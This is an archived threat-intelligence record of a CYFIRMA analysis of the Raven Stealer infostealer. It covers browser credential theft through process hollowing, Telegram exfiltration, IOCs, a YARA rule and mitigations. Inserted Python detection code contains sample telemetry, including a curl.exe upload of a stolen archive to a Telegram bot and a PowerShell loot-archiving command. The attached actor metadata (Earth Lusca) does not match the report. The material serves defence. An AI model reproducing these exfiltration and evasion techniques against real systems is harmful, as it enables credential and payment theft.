{
	"id": "90e134a0-0048-48ef-bad9-8aed0520a017",
	"created_at": "2026-04-06T00:07:38.762038Z",
	"updated_at": "2026-04-10T13:11:31.233719Z",
	"deleted_at": null,
	"sha1_hash": "10b597cb57adeef2983f1b087af23b738d258268",
	"title": "RAVEN STEALER UNMASKED: Telegram-Based Data Exfiltration. - CYFIRMA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2848047,
	"plain_text": "RAVEN STEALER UNMASKED: Telegram-Based Data\r\nExfiltration. - CYFIRMA\r\nArchived: 2026-04-05 21:31:01 UTC\r\nPublished On : 2025-07-26\r\nEXECUTIVE SUMMARY\r\nRaven Stealer is a modern, lightweight, information-stealing malware developed primarily in Delphi and C++,\r\ndesigned to extract sensitive data from victim machines with minimal user interaction and high operational stealth.\r\nPromoted under the guise of “educational use,” Raven Stealer demonstrates functionality consistent with malicious\r\nintent, including credential theft, browser data harvesting, and real-time data exfiltration via Telegram bot\r\nintegration.\r\nThe stealer specifically targets Chromium-based browsers (such as Chrome and Edge), extracting passwords,\r\ncookies, saving payment details, and autofill information. Its use of a modular architecture and a built-in resource\r\neditor allows attackers to embed configuration details (like Telegram bot tokens and chat IDs) directly into the\r\ncompiled payload. This structure streamlines the deployment process, enabling even low-skill threat actors to launch\r\ncredential-harvesting campaigns.\r\nhttps://www.cyfirma.com/research/raven-stealer-unmasked-telegram-based-data-exfiltration/\r\nPage 1 of 17\n\nUnlike Python-based stealers, Raven’s compiled binaries are packed using UPX, reducing their size and improving\r\nevasion against static detection mechanisms. The malware executes in a fully hidden state, leaving no visible traces\r\nor UI elements during runtime, which significantly lowers the chance of user detection.\r\nRaven Stealer is actively distributed through GitHub repositories and promoted via the Telegram channel. This\r\nchannel functions as both a development log and distribution platform, regularly sharing builder updates, guides,\r\nand promotional content for the stealer. 
The use of Telegram for C2-like behavior, paired with a clean user interface\r\nand dynamic module support, positions Raven Stealer as a commercially attractive tool within the commodity\r\nmalware ecosystem.\r\nINTRODUCTION\r\nThe rise of modular, easy-to-deploy information stealers reflects a growing trend in the cybercriminal ecosystem,\r\nlowering the technical barrier to entry for threat actors while increasing the scale and automation of credential theft\r\noperations. Raven Stealer is one such tool: a Delphi/C++-based stealer that offers robust credential extraction,\r\nstealth execution, and real-time exfiltration via Telegram.\r\nBuilt with a focus on usability and evasion, Raven enables even novice attackers to deploy credential theft\r\ncampaigns with minimal setup.\r\nRaven Stealer is actively maintained and distributed through GitHub and a dedicated Telegram channel, ZeroTrace,\r\nwhich functions as the main communication and distribution hub for the tool. Notably, the same threat actor or\r\ngroup associated with Raven is also linked to the release of Octalyn Stealer, a separate but similarly featured stealer,\r\nsuggesting an evolving portfolio of malware under a single development entity. 
This signals a broader intent to\r\ndominate the low-tier malware-as-a-service (MaaS) space through continuous iteration and brand diversification.\r\nThis report provides a technical analysis of Raven Stealer’s capabilities, explores its external distribution\r\ninfrastructure, maps observed behaviors to the MITRE ATT\u0026CK framework, and outlines strategic\r\nrecommendations for detection and defense.\r\nSTATIC ANALYSIS\r\nFile               MD5                               Target Technology  Language\r\nRavenStealer.exe   6237a776e38b6a60229ac12fc6b21fb3  Windows OS         Delphi (builder)\r\nv8Axs07p.3mf.exe   f74ec376aa22ce0b0d55023d8877dc72  Windows OS         C++ (generated stub)\r\nThe builder, developed using Delphi, features a graphical user interface (GUI) that enables the user to generate a\r\ncustomized stub payload either in its original form or packed with UPX. The generated payload is assigned a\r\nrandomly generated twelve-character name (here v8Axs07p.3mf). By providing a Telegram bot token and chat ID, the user\r\ncan configure the payload to communicate via Telegram. The embedded stub payload, written in C++, is integrated within the\r\nbuilder.\r\nAnalysis of v8Axs07p.3mf.exe\r\nThe entropy value of v8Axs07p.3mf.exe exceeds 7, indicating that the file is likely packed. Such packing is commonly\r\nemployed to shrink the binary, obstruct reverse engineering and complicate static analysis.\r\nThe file was successfully unpacked with the stock UPX utility (upx -d). A modified or custom packer would have failed\r\nto decompress this way, so the clean unpack confirmed the use of unmodified UPX packing and enabled further static and\r\ndynamic analysis.\r\nThe malware stores the Telegram chat_id and bot token in plain text within embedded resources, specifically under\r\nresource IDs 102 and 103. 
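The entropy check and the plaintext configuration lend themselves to a small triage script. The following Python is an added example written for this edit, not code from CYFIRMA or from the Raven Stealer project: it computes Shannon entropy, looks for the UPX0/UPX1 section names and the UPX! marker that stock UPX leaves in a packed file, and sweeps an unpacked blob for a Telegram bot token with a chat_id nearby. The token shape (an 8 to 10 digit bot id, a colon, then 35 token characters) is assumed from the Bot API and is not stated in the report, and both sample blobs are constructed; a real sample would be loaded with open(path, 'rb').read() after upx -d.

```python
import math
import re

# Added example (not CYFIRMA's or the Raven Stealer project's code): static triage
# of a stealer sample. The token format and the sample blobs are assumptions for this example.

# Telegram bot token: 8-10 digit bot id, ':', 35 token chars (assumed from the Bot API).
TOKEN_RE = re.compile(rb'(?<![0-9A-Za-z_:-])([0-9]{8,10}:[A-Za-z0-9_-]{35})(?![0-9A-Za-z_:-])')
# chat_id: optional leading minus for groups/channels, then 6-14 digits, standing alone.
CHAT_RE = re.compile(rb'(?<![0-9A-Za-z_:-])(-?[0-9]{6,14})(?![0-9A-Za-z_:-])')
NUL = bytes([0])


def shannon_entropy(data: bytes) -> float:
    # Bits per byte: 0.0 for a constant stream, 8.0 for uniform bytes.
    # Packed or encrypted sections sit near the top of that range (the report: above 7).
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def looks_upx_packed(pe: bytes) -> bool:
    # Stock UPX keeps the UPX0/UPX1 section names and a 'UPX!' marker in the packed file.
    return b'UPX!' in pe or (b'UPX0' in pe and b'UPX1' in pe)


def find_telegram_config(pe: bytes):
    # Returns (bot_token, chat_id) found as plain text, or (None, None).
    # Only meaningful on the unpacked stub: UPX compresses the original strings away.
    m = TOKEN_RE.search(pe)
    if not m:
        return None, None
    token = m.group(1)
    # The chat_id lives in a neighbouring resource, so look in a window around the token.
    window = pe[max(0, m.start() - 256):m.end() + 256]
    for cm in CHAT_RE.finditer(window):
        cand = cm.group(1)
        if cand not in token:          # never mistake the bot id half of the token for a chat_id
            return token.decode(), cand.decode()
    return token.decode(), None


def triage(pe: bytes) -> dict:
    ent = shannon_entropy(pe)
    token, chat = find_telegram_config(pe)
    return {
        'entropy': round(ent, 2),
        'upx_markers': looks_upx_packed(pe),
        'likely_packed': ent > 7.0,     # unpack with upx -d before trusting the string sweep
        'bot_token': token,
        'chat_id': chat,
    }


# Constructed samples: a packed look-alike (uniform bytes, entropy about 8) and an unpacked
# stub with a fake token and chat_id embedded as NUL-separated plain text, like resources 102/103.
FAKE_TOKEN = b'123456789:AAH' + b'x' * 32          # 9 digits, colon, 35 chars; not a real token
FAKE_CHAT_ID = b'-1001234567890'
PACKED_SAMPLE = b'MZ' + b'UPX0' + b'UPX1' + b'UPX!' + bytes(range(256)) * 16
UNPACKED_SAMPLE = b'MZ' + b'A' * 64 + NUL + FAKE_TOKEN + NUL * 4 + FAKE_CHAT_ID + NUL + b'A' * 64

if __name__ == '__main__':
    for name, blob in (('packed', PACKED_SAMPLE), ('unpacked', UNPACKED_SAMPLE)):
        print(name, triage(blob))
```

Running it against the packed blob reports high entropy and UPX markers but no configuration, which is the expected outcome on the raw sample; the unpacked blob yields the token and chat_id, and the recovered token is what lets an analyst identify the attacker's Telegram channel.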
It also includes a PAYLOAD_DLL as an embedded resource whose entropy is close to the maximum of 8, indicating\r\nthat the DLL is encrypted or otherwise obfuscated (it is described below as a ChaCha20-encrypted resource). This payload is\r\nintended for injection into a legitimate process.\r\nSeveral imported functions, such as Process32NextW, GetCurrentProcessId, and CreateProcessW, along with the\r\nunusually large size of certain resource sections, indicate that the malware is designed to perform DLL injection into\r\nlegitimate processes.\r\nAt its main entry point, the malware hides its console window by calling the Windows API ShowWindow with the\r\nSW_HIDE flag. To further enhance stealth, it sets the extended window style 0x80 (WS_EX_TOOLWINDOW),\r\nwhich removes the window from the taskbar and Alt+Tab view, effectively preventing any visible popup and making\r\nthe process less noticeable to the user.\r\nExtracting Bot Token and ChatID from Embedded Resources:\r\nThe malware leverages the Windows API functions FindResourceW and LoadResource, with the fixed resource IDs, to\r\nextract the embedded Telegram bot token and chat_id. This data is then loaded into memory and used for command-and-control (C2) communication during execution.\r\nDecrypt Chromium-based browsers’ passwords:\r\nThis malware bypasses Chromium’s App-Bound Encryption (ABE) using in-memory techniques. ABE ties decryption of the\r\nbrowser’s data key to the browser itself, so code that runs inside a legitimate browser process can decrypt what an external\r\nprocess cannot. It starts a legitimate browser process in a suspended state, then uses Direct Syscall-based Reflective\r\nProcess Hollowing to inject its payload. 
By taking over the browser’s security context, it can decrypt and steal sensitive data like\r\npasswords, cookies, payment info, without touching disk or triggering user-land hooks.\r\nLaunches the browser in a suspended state\r\nThe malware relaunches the browser with arguments such as --headless, --disable-gpu, and --no-sandbox for stealth,\r\nstability, and easier exploitation.\r\n--headless: Runs the browser without a visible UI. This avoids user suspicion and saves system resources.\r\n--disable-gpu / --disable-software-rasterizer: Prevents GPU-related issues in headless mode, making the browser run\r\nmore reliably in a virtualized or background environment.\r\n--no-sandbox: Disables Chromium’s built-in sandbox, lowering security barriers and making injection and memory\r\nmanipulation easier. A Chromium browser started with this flag combination by a non-browser parent is itself a strong\r\ndetection signal.\r\nIn-Memory DLL Injection into Chromium\r\nThe malware carries its main payload DLL as a ChaCha20-encrypted resource embedded within itself. This payload\r\nis decrypted in memory at runtime, never touching disk, and is injected into a web browser process. Instead of\r\ncompromising an existing process, the malware creates a new instance of the browser in a suspended state using\r\nCreateProcessW. This untouched, suspended process becomes the target for reflective process hollowing, allowing\r\nthe injected code to run under the browser’s identity while avoiding common detection mechanisms.\r\nReflective Injection via Syscalls:\r\nBy issuing syscalls directly rather than through the ntdll.dll exports that security products commonly hook, the\r\nmalware sidesteps the user-mode API hooks that many antivirus and EDR products rely on, and targets processes like\r\nchrome.exe and brave.exe to extract sensitive data. 
It allocates memory in the remote process using\r\nNtAllocateVirtualMemory, writes the decrypted payload into that space with NtWriteVirtualMemory, and sets the\r\nmemory region to executable using NtProtectVirtualMemory. To enable communication, it creates a named pipe and\r\nwrites its identifier directly into the target process’s memory.\r\nEnumeration and Extraction of Stored Browser Credentials\r\nThe malware performs system-wide enumeration to locate stored credentials on the infected machine. It specifically\r\nsearches for saved browser data, including passwords and authentication cookies, from applications such as Chrome,\r\nBrave, and other Chromium-based browsers.\r\nIn addition, the malware collects information from sources such as cryptocurrency wallets, saved passwords,\r\nbrowser cookies, gaming platforms, VPN clients, and instant messaging services. It then stores the\r\nstolen data in the user’s AppData directory in a well-organized folder structure for later exfiltration.\r\nDYNAMIC ANALYSIS:\r\nStorage of Exfiltrated Data\r\nThe malware executes a PowerShell command to create an archive of the collected data, packaging files from the\r\nAppData directory into a compressed file stored in the Temp folder.\r\nAll stolen credentials and system information are stored in an organized directory structure within the\r\n%Local%\\\\RavenStealer folder.\r\nSubfolders include categories like Chrome, Crypto wallets, Edge, and others. 
Individual files, such as\r\nscreenshot.png, further structure the harvested data, making it easy for the attacker to parse and review once\r\nexfiltrated through the Telegram bot.\r\nUpon completion of data collection, the contents of the folder are compressed into a ZIP archive and stored in the\r\nsystem’s temporary directory. The archive filename is built from the current user’s username followed by a fixed suffix.\r\nData Exfiltration\r\nNetwork traffic analysis reveals that the malware uses curl.exe with specific arguments to upload the\r\nZIP file via the Telegram Bot API. It calls the /sendDocument method to send the stolen credentials directly to the\r\nattacker’s Telegram bot, using the embedded CHAT_ID and BOT TOKEN. Because the bot token is both embedded in the\r\nsample and part of the API URL passed to curl.exe, an analyst who recovers it also recovers the attacker’s exfiltration channel.\r\nUpon successfully establishing a connection with the attacker-controlled Telegram bot, Raven Stealer transmits the\r\nname of a uniquely identifiable ZIP archive to indicate successful infection and data exfiltration. The archive name\r\ntypically incorporates the victim’s system username, appended with a fixed suffix such as RavenStealer.zip. This\r\nconsistent naming convention allows the threat actor to systematically organize, monitor, and correlate exfiltrated\r\ndata with individual victims across numerous compromised systems.\r\nUpon downloading and extracting the exfiltrated ZIP archive, the contents are presented in a structured and\r\nsystematic format, enabling efficient access and analysis by the threat actor. 
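The browser launch flags described earlier and the curl.exe upload to the Telegram sendDocument endpoint described above are both visible in process-creation telemetry. The following Python is an added example for this edit, not CYFIRMA's tooling: it runs three checks over constructed Sysmon-style Event ID 1 records (a Chromium browser started --headless --no-sandbox by a non-browser parent, PowerShell compressing a RavenStealer folder into Temp, and curl.exe posting a document to a Telegram bot), and redacts the secret half of the bot token before the command line is written into an alert. The field names, paths, archive name and token in the sample records are assumptions constructed for the example.

```python
import re

# Added example (not CYFIRMA's tooling): detection logic for the process chain the report
# describes, run over constructed Sysmon-style Event ID 1 records. Field names, paths,
# the archive name and the token below are assumptions made for this example.

BS = chr(92)   # a backslash, built at runtime so the sample paths read as Windows paths


def winpath(*parts):
    return BS.join(parts)


BROWSERS = ('chrome.exe', 'msedge.exe', 'brave.exe')
SHELLS = ('powershell.exe', 'pwsh.exe')
# Telegram Bot API upload URL: /bot BOTID:SECRET /sendDocument (token shape assumed from the Bot API)
TG_RE = re.compile(r'api[.]telegram[.]org/bot([0-9]{8,10}):([A-Za-z0-9_-]{35})/sendDocument', re.I)


def basename(path):
    return path.rsplit(BS, 1)[-1].lower()


def redact_token(cmdline):
    # Keep the bot id for correlation and takedown requests, drop the secret half.
    return TG_RE.sub(lambda m: 'api.telegram.org/bot' + m.group(1) + ':[redacted]/sendDocument', cmdline)


def check_event(ev):
    # ev has Image, ParentImage and CommandLine; returns the names of the rules that fired.
    image, parent = basename(ev['Image']), basename(ev['ParentImage'])
    cmd = ev['CommandLine']
    low = cmd.lower()
    alerts = []
    # 1. Chromium started headless and without its sandbox by something that is not a browser:
    #    the suspended hollowing target the report describes. A browser relaunching itself is normal.
    if image in BROWSERS and parent not in BROWSERS and '--headless' in low and '--no-sandbox' in low:
        alerts.append('headless_nosandbox_browser_from_nonbrowser_parent')
    # 2. PowerShell zipping the RavenStealer loot folder (the report: AppData into Temp).
    if image in SHELLS and 'compress-archive' in low and 'ravenstealer' in low:
        alerts.append('powershell_archive_of_stealer_loot')
    # 3. curl.exe uploading a document to a Telegram bot; the username + RavenStealer.zip name is a bonus hit.
    if image == 'curl.exe' and TG_RE.search(cmd):
        alerts.append('curl_telegram_senddocument')
        if re.search(r'ravenstealer[.]zip', low):
            alerts.append('ravenstealer_archive_name')
    return alerts


def scan(events):
    # Returns (alerts, redacted command line) for every event that fired at least one rule.
    hits = []
    for ev in events:
        fired = check_event(ev)
        if fired:
            hits.append((fired, redact_token(ev['CommandLine'])))
    return hits


# Constructed telemetry: the stealer stub (named as in the report) spawns the three child processes.
STUB = winpath('C:', 'Users', 'victim', 'AppData', 'Local', 'Temp', 'v8Axs07p.3mf.exe')
CHROME = winpath('C:', 'Program Files', 'Google', 'Chrome', 'Application', 'chrome.exe')
SYS32 = winpath('C:', 'Windows', 'System32')
FAKE_TOKEN = '123456789:AAH' + 'x' * 32           # shape of a bot token; not a real one
ARCHIVE = winpath('%TEMP%', 'victimRavenStealer.zip')
SAMPLE_EVENTS = [
    {'Image': CHROME, 'ParentImage': STUB,
     'CommandLine': 'chrome.exe --headless --disable-gpu --disable-software-rasterizer --no-sandbox'},
    {'Image': winpath(SYS32, 'WindowsPowerShell', 'v1.0', 'powershell.exe'), 'ParentImage': STUB,
     'CommandLine': 'powershell -NoProfile Compress-Archive -Path '
                    + winpath('%LOCALAPPDATA%', 'RavenStealer') + ' -DestinationPath ' + ARCHIVE},
    {'Image': winpath(SYS32, 'curl.exe'), 'ParentImage': STUB,
     'CommandLine': 'curl.exe -F chat_id=-1001234567890 -F document=@' + ARCHIVE
                    + ' https://api.telegram.org/bot' + FAKE_TOKEN + '/sendDocument'},
    {'Image': CHROME, 'ParentImage': winpath('C:', 'Windows', 'explorer.exe'),
     'CommandLine': 'chrome.exe --profile-directory=Default'},     # benign launch, must not fire
]

if __name__ == '__main__':
    for fired, cmdline in scan(SAMPLE_EVENTS):
        print(fired, cmdline)
```

The benign fourth record shows why the parent-process condition matters: Chrome spawning its own headless helpers is routine, while a headless, sandbox-less browser whose parent is an executable in Temp is the hollowing pattern the report describes. Keeping the bot id while redacting the secret lets the alert be correlated with other victims without leaving a usable token in the SIEM.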
The archive typically includes several\r\ndirectories and files, each representing specific categories of compromised data.\r\nFolders:\r\nChrome \u003e Default: Contains browser-specific data files such as cookies.txt, password.txt, and payment.txt,\r\nextracted from the default user profile of Google Chrome.\r\nEdge \u003e Default: Includes cookies.txt, password.txt, and payment.txt, retrieved from the default user profile of\r\nMicrosoft Edge.\r\nCrypto Wallets: Stores information extracted from browser-based or locally installed cryptocurrency wallets,\r\nincluding wallet addresses, private keys, and configuration files.\r\nFiles:\r\ncookies.txt: A compiled collection of cookies gathered from multiple browsers, typically used for session\r\nhijacking; a stolen session cookie works without the password, so server-side session invalidation matters as much as a\r\npassword reset.\r\npasswords.txt: Includes decrypted or plaintext credentials saved within web browsers.\r\npayment.txt: Extracted payment-related data, such as saved credit or debit card details and associated billing\r\ninformation stored in the browser.\r\nscreenshot.png: A desktop screenshot captured at the time of execution, providing the attacker with visual\r\ncontext of the compromised environment.\r\nThis structured layout allows the threat actor to efficiently locate, interpret, and exploit a wide range of sensitive\r\ninformation. It reflects Raven Stealer’s comprehensive data collection capabilities, spanning personal details, login\r\ncredentials, financial information, and visual evidence of system activity.\r\nEXTERNAL THREAT LANDSCAPE MANAGEMENT\r\nRaven Stealer is attributed to a threat actor or developer group operating under the name ZeroTrace Team, which\r\nmaintains an active presence across both GitHub and Telegram. 
The stealer was first publicly uploaded to GitHub on\r\nJuly 15, 2025, and includes numerous indicators pointing to a consistent development identity.\r\nNotably, internal file paths recovered from the repository’s build artifacts, such as the ‘.identcache’ file, include\r\nreferences to a development environment that reveal a local Windows machine setup, indicating a specific user\r\naccount was involved.\r\nWithin the source code itself, specifically in the RavenStealer.cpp file, a hardcoded author declaration attributes the\r\nwork to the ZeroTrace Team. The content includes a name and a Hotmail email address, suggesting deliberate\r\nbranding and author tagging consistent with attempts to gain visibility within illicit developer communities.\r\nTheir Telegram channel frequently shares builder updates, usage tutorials, and stealer variants, and serves as a\r\ncontact point for threat actors and users. Telegram’s anonymity, wide reach, and ease of bot integration make it a\r\npopular choice for real-time data exfiltration, especially for credential logs and screenshots.\r\nThe ZeroTrace Telegram channel was created on April 30, 2025, initially promoting a custom crypter tool branded\r\nas “ZeroTrace”, and has since expanded to publish and promote multiple stealer variants, including Raven Stealer\r\nand Octalyn Stealer, often hosted and shared via open-source repositories.\r\nThe stealer’s builder tool allows threat actors to directly embed Telegram Bot Tokens and Chat IDs into the payload,\r\nenabling seamless delivery of stolen data to private Telegram chats. 
Through this mechanism, Telegram acts as both\r\nthe communication layer and the exfiltration endpoint, replacing traditional C2 servers.\r\nAdditionally, the same channel is used to promote another malware strain named Octalyn Stealer, which shares\r\nstructural and operational similarities with Raven Stealer. The use of a single Telegram hub for both tools suggests\r\nthat ZeroTrace Team actively maintains multiple infostealer variants, likely to diversify branding, bypass signature-based detection, and expand reach across different threat actor groups.\r\nTogether, these infrastructure elements, GitHub repositories, Telegram-based distribution and exfiltration, and direct\r\ndeveloper attribution provide a clear external footprint of the Raven Stealer ecosystem.\r\nCONCLUSION\r\nRaven Stealer incorporates advanced stealth capabilities by executing silently without displaying a console or\r\ncommand prompt, thereby significantly reducing the risk of user detection. It facilitates the extraction of sensitive\r\ndata, including browser credentials, cookies, payment information, and autofill details from Chromium-based\r\nbrowsers, while also extending its targeting to include gaming services, VPN clients, and cryptocurrency wallets. Its\r\nmodular design, embedded configuration options, and UPX packing enhance its ability to evade static detection and\r\nsimplify deployment, rendering it accessible even to actors with limited technical expertise. Distributed via GitHub\r\nand promoted through Telegram, Raven Stealer exfiltrates over TLS to the Telegram Bot API, where its traffic blends\r\nwith legitimate Telegram use, and integrates seamlessly with Telegram bots for real-time data transmission and campaign\r\nmanagement. 
These characteristics reflect its ongoing\r\ndevelopment and reinforce its potential as a substantial threat when utilized beyond legitimate research or controlled\r\nenvironments.\r\nMITRE ATTACK FRAMEWORK\r\nTactic               ID         Technique Name\r\nExecution            T1129      Shared Modules\r\nPersistence          T1542      Pre-OS Boot\r\n                     T1542.003  Pre-OS Boot: Bootkit\r\nDefense Evasion      T1027      Obfuscated Files or Information\r\n                     T1027.002  Obfuscated Files or Information: Software Packing\r\n                     T1027.005  Obfuscated Files or Information: Indicator Removal from Tools\r\n                     T1497      Virtualization/Sandbox Evasion\r\n                     T1542      Pre-OS Boot\r\n                     T1542.003  Pre-OS Boot: Bootkit\r\n                     T1564      Hide Artifacts\r\n                     T1564.003  Hide Artifacts: Hidden Window\r\nDiscovery            T1057      Process Discovery\r\n                     T1082      System Information Discovery\r\n                     T1083      File and Directory Discovery\r\n                     T1497      Virtualization/Sandbox Evasion\r\n                     T1518      Software Discovery\r\n                     T1518.001  Software Discovery: Security Software Discovery\r\n                     T1614      System Location Discovery\r\nCommand and Control  T1071      Application Layer Protocol\r\nINDICATORS OF COMPROMISE\r\nS.N.  Indicator (SHA-256)                                               Type  Context\r\n1.    2e0b41913cac0828faeba29aebbf9e1b36f24e975cc7d8fa7f49212e867a3b38  EXE   RavenStealer.exe\r\n2.    28d6fbbdb99e6aa51769bde016c61228ca1a3d8c8340299e6c78a1e004209e55  EXE   v8Axs07p.3mf.exe\r\n3. 
252fb240726d9590e55402cebbb19417b9085f08fc24c3846fc4d088e79c9da9  DLL   PAYLOAD_DLL.dll\r\nYARA RULES\r\nrule RavenStealer_Detection\r\n{\r\n    meta:\r\n        description = \"Detects Raven Stealer by identifying strings and embedded hash values\"\r\n        author = \"Cyfirma Research\"\r\n        date = \"2025-07-23\"\r\n        malware_family = \"Raven Stealer\"\r\n    strings:\r\n        // IOC strings\r\n        $s1 = \"api.telegram.org\" nocase\r\n        $s2 = \"RavenStealer\" nocase\r\n        $s3 = \"passwords.txt\" nocase\r\n        $s4 = \"payment.txt\" nocase\r\n        $s5 = \"autofill.txt\" nocase\r\n        $s6 = \"%Local%\\\\RavenStealer\\\\Chrome\" nocase\r\n        $s7 = \"%Local%\\\\RavenStealer\\\\Edge\" nocase\r\n        $s8 = \"Crypto Wallets\" nocase\r\n        // Known SHA-256 hashes as string literals (only useful if a hash is embedded in the binary or visible)\r\n        $s9 = \"2e0b41913cac0828faeba29aebbf9e1b36f24e975cc7d8fa7f49212e867a3b38\"\r\n        $s10 = \"28d6fbbdb99e6aa51769bde016c61228ca1a3d8c8340299e6c78a1e004209e55\"\r\n        $s11 = \"252fb240726d9590e55402cebbb19417b9085f08fc24c3846fc4d088e79c9da9\"\r\n    condition:\r\n        // Match if at least 3 of the above strings appear\r\n        3 of ($s*)\r\n}\r\nThe rule keys on strings that exist only in the unpacked stub, so run it against the upx -d output or against process\r\nmemory rather than the packed file. Because $s1 to $s8 are generic plain-text strings and any three of them suffice, expect\r\nhits on documents that merely discuss the malware (including this report); confirm a match with the file hashes or the\r\nPAYLOAD_DLL resource before acting on it.\r\nRecommendations and Mitigation Strategies\r\n1. Endpoint Detection \u0026 Response (EDR) and Antivirus\r\nDeploy advanced EDR solutions capable of behavioral analysis to detect anomalous activities such as\r\ncredential harvesting, ZIP file creation in temp directories, headless browser launches from non-browser parents, and\r\nclipboard access.\r\nEnsure antivirus/antimalware software includes real-time protection and heuristic scanning to detect packed\r\nbinaries (e.g., UPX-packed executables).\r\nUse YARA rules to proactively hunt for known indicators associated with Raven Stealer, such as strings\r\nrelated to Telegram API usage and stolen data paths.\r\n2. 
Network and TLS Traffic Monitoring\r\nMonitor for outbound connections to api.telegram.org, especially from unusual processes (such as curl.exe spawned by a\r\nbinary in a user directory), as this is a key C2 and exfiltration vector.\r\nDeploy TLS/SSL inspection at the gateway level where legally and technically feasible, to identify suspicious\r\nencrypted traffic patterns.\r\nImplement DNS filtering or IP-based blocking of Telegram C2 endpoints if Telegram is not required for\r\nbusiness use.\r\n3. Application Whitelisting and Execution Control\r\nRestrict execution of unauthorized binaries, especially from %Temp%, %AppData%, and %LocalAppData%\r\ndirectories.\r\nPrevent execution of binaries with high entropy or known packing signatures (e.g., UPX) in user-writable\r\ndirectories.\r\n4. Email and Download Filtering\r\nConfigure email gateways to block executable attachments, archive files containing executables, or double-extension\r\nnames (e.g., .3mf.exe) used to evade detection.\r\nEmploy browser sandboxing and download monitoring to prevent unauthorized payload delivery.\r\n5. Credential Management and Browser Hardening\r\nAdvise users not to store credentials or payment information in browsers. Use enterprise password managers\r\nwith MFA support.\r\nDisable browser autofill and password saving features.\r\nRegularly clear stored browser data and cookies across endpoints.\r\n6. Telegram and GitHub Monitoring\r\nMonitor and restrict the use of unauthorized Telegram applications on corporate systems. Implement DLP\r\n(Data Loss Prevention) to identify suspicious data egress.\r\nRegularly scan GitHub and dark web platforms for new instances of Raven Stealer or associated ZeroTrace\r\nartifacts using threat intelligence feeds and code similarity detection tools.\r\n7. 
User Awareness and Training\r\nConduct ongoing phishing simulation campaigns and train employees on malware delivery tactics like\r\ndisguised executables (e.g., invoice.3mf.exe) and fake educational tools.\r\nWarn users about the risks of downloading software from GitHub repositories without validation.\r\n8. Incident Response Preparedness\r\nEnsure incident response plans account for credential-stealing malware and C2 over encrypted messaging\r\nplatforms.\r\nIn the event of detection, revoke all browser-stored credentials, invalidate sessions (stolen cookies remain valid until\r\nthe server-side session is terminated), and perform password resets.\r\nCapture forensic images and logs for deeper analysis and evidence preservation.\r\nSource: https://www.cyfirma.com/research/raven-stealer-unmasked-telegram-based-data-exfiltration/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.cyfirma.com/research/raven-stealer-unmasked-telegram-based-data-exfiltration/"
	],
	"report_names": [
		"raven-stealer-unmasked-telegram-based-data-exfiltration"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434058,
	"ts_updated_at": 1775826691,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/10b597cb57adeef2983f1b087af23b738d258268.pdf",
